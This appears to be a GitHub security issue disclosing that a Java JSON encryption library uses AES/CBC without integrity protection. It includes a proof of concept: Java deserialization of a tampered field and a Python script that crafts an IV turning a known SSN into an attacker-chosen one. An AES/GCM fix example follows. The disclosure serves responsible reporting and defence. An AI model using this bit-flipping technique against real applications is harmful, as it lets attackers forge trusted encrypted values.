Information about lack of integrity protection missing | Security #12

@niebardzo

Description

Hey @codesqueak,

Awesome library, but I have noticed that you do not mention anything about the usage of this library. Since AES/CBC is used, it does not offer any integrity protection of the ciphertext like a MAC (it is malleable). If the library is wrongly used, e.g. someone trusts it to keep the integrity of the data, it might lead to a security issue in their application.

For simplicity, I can show a simple example where someone was encrypting a Social Security Number (SSN) when serializing to JSON. The developer made the false assumption that since the value is encrypted it cannot be tampered with, and trusted it for authentication or for authorizing some actions in the system. Now, let's say that the IV, salt and value (ciphertext) are under the control of the user/attacker (e.g. those values are encoded and stored in a cookie for keeping the user's session). The attacker can change the IV so that the ciphertext will be decrypted to a plaintext of the attacker's choice.

Below you can see the Java code:

        ObjectMapper objectMapper = EncryptionService.getInstance("Password1");
        // Sample good SSN: 790714615 - the attacker knows it because he has set up the account
        String json1 = "{\"ssn\":{\"salt\":\"uzaYY1PaEpWS6SC9lUWKWw==\",\"iv\":\"6mCYbjLB2mEk1gsWRqiWiw==\",\"value\":\"JZpjE/JqkrdOi1JcGAtP9w==\"}}";
        SSNGetterPoJo pojo1 = objectMapper.readValue(json1, SSNGetterPoJo.class);
        System.out.println(pojo1.getSSN());
        // Same salt and value, only the IV changed: decryption yields the fake SSN 111111111 without any error
        String json2 = "{\"ssn\":{\"salt\":\"uzaYY1PaEpWS6SC9lUWKWw==\",\"iv\":\"6maQbzTB32Yk0gsWRqiWiw==\",\"value\":\"JZpjE/JqkrdOi1JcGAtP9w==\"}}";
        SSNGetterPoJo pojo2 = objectMapper.readValue(json2, SSNGetterPoJo.class);
        System.out.println(pojo2.getSSN());

SSNGetterPoJo.java is almost the same as SecureGetterPojo.java

Here is the Python 3 code that I used to generate the IV which changes the plaintext after decryption:

import base64


def xors(s1, s2):
    """XOR two equal-length strings character by character, returning bytes."""
    return bytes(ord(a) ^ ord(b) for a, b in zip(s1, s2))


def xorb(s1, s2):
    """XOR two byte strings; the result is as long as the shorter input."""
    return bytes(a ^ b for a, b in zip(s1, s2))


# Difference between the real SSN and the one we want decryption to produce.
# In CBC mode the first plaintext block is XORed with the IV, so flipping
# these bits in the IV flips the same bits in the decrypted plaintext.
a1 = xors("790714615", "111111111")
iv = "6mCYbjLB2mEk1gsWRqiWiw=="

b1 = base64.b64decode(iv)
# Offset 1: the serialized plaintext starts with the JSON quote character,
# so the nine SSN digits occupy bytes 1..9 of the first block.
new_iv = b1[0:1] + xorb(b1[1:], a1) + b1[10:]

print(base64.b64encode(new_iv).decode())

It would be worth mentioning that in the description of this library, or, if you want to offer integrity protection, change the cipher to one offering a MAC, like AES/GCM. If you decide to change the cipher to AES/GCM, then it would be cool to create a Security Advisory and assign a CVE-ID for that issue with me as the reporter.
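To show what the AES/GCM recommendation buys, here is an added example that is not code from the issue or from the library it reports against: a field is stored as the same salt/iv/value triple, but with an authenticated cipher, so the IV flip used above makes decryption fail instead of silently producing the chosen plaintext. The `EncryptedField` record, the `GcmFieldDemo` class name and the PBKDF2 parameters (65536 iterations, 256-bit key) are assumptions made for this example; the sample SSN value is constructed.

```java
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import javax.crypto.AEADBadTagException;
import javax.crypto.Cipher;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;

public class GcmFieldDemo {
    // Hypothetical holder for the same salt/iv/value triple the issue's JSON carries.
    record EncryptedField(byte[] salt, byte[] iv, byte[] value) {}
    // Password -> AES key via PBKDF2; iteration count and key size are assumptions.
    static SecretKeySpec deriveKey(char[] password, byte[] salt) throws Exception {
        byte[] raw = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256")
                .generateSecret(new PBEKeySpec(password, salt, 65536, 256)).getEncoded();
        return new SecretKeySpec(raw, "AES");
    }
    static EncryptedField encrypt(char[] password, String plaintext) throws Exception {
        SecureRandom rng = new SecureRandom();
        byte[] salt = new byte[16]; rng.nextBytes(salt);
        byte[] iv = new byte[12];   rng.nextBytes(iv);   // 96-bit GCM nonce; never reuse under one key
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.ENCRYPT_MODE, deriveKey(password, salt), new GCMParameterSpec(128, iv));
        c.updateAAD(salt);   // the salt is covered by the tag too, so it cannot be swapped either
        return new EncryptedField(salt, iv, c.doFinal(plaintext.getBytes(StandardCharsets.UTF_8)));
    }
    // Returns null if the 128-bit tag does not verify, i.e. salt, iv or value were modified.
    static String decrypt(char[] password, EncryptedField f) throws Exception {
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.DECRYPT_MODE, deriveKey(password, f.salt()), new GCMParameterSpec(128, f.iv()));
        c.updateAAD(f.salt());
        try {
            return new String(c.doFinal(f.value()), StandardCharsets.UTF_8);
        } catch (AEADBadTagException e) {
            return null;
        }
    }
    public static void main(String[] args) throws Exception {
        char[] pw = "Password1".toCharArray();
        EncryptedField good = encrypt(pw, "\"790714615\"");   // constructed sample value
        System.out.println("untampered: " + decrypt(pw, good));
        byte[] badIv = good.iv().clone();
        badIv[1] ^= ('7' ^ '1');   // the IV flip from the issue, which CBC would silently accept
        EncryptedField tampered = new EncryptedField(good.salt(), badIv, good.value());
        System.out.println("tampered iv: " + decrypt(pw, tampered));
    }
}
```

The caller must treat a null (or, if you let it propagate, the AEADBadTagException) as a hard failure and never fall back to the CBC path; with GCM the 12-byte IV also has to be fresh for every encryption under the same key, which the random nonce above provides.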
